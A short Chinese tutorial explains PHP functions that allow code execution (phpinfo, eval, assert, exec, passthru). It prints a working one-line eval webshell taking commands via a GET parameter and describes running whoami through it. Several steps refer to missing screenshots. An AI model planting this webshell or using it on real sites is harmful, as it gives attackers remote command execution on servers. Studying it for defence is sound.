首先就是PHPinfo()这个函数,这个函数的主要作用就是查看网站上的各种信息:
随后我们来进行访问网站:
就看到网站上的各种信息。
这个函数的主要作用就是执行PHP函数,通常在写一句话木马的时候使用
<?PHP
@eval($_GET['cmd']);
?>
可以看到我们通过使用GET传参执行system函数成功执行命令。
当然有时候网站肯定是将eval函数给禁用的那总么办呢,还有一个函数和它作用差不多
assert()函数
接着我们看网站:
执行成功。
assert()的作用与eval()基本相同,都是用来执行PHP命令。eval()可以将字符串解析为PHP命令,而assert()内必须是PHP语句,不能是字符串。允许的:eval(‘PHPinfo()’);eval(PHPinfo());assert(PHPinfo());不允许的:assert(‘PHPinfo()’);
在网站中输入whoami我们看是否能执行成功:
执行成功。
下面再介绍几个可以执行系统命令的函数:
echo exec():
passthru:
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 [email protected] 举报,一经查实,本站将立刻删除。
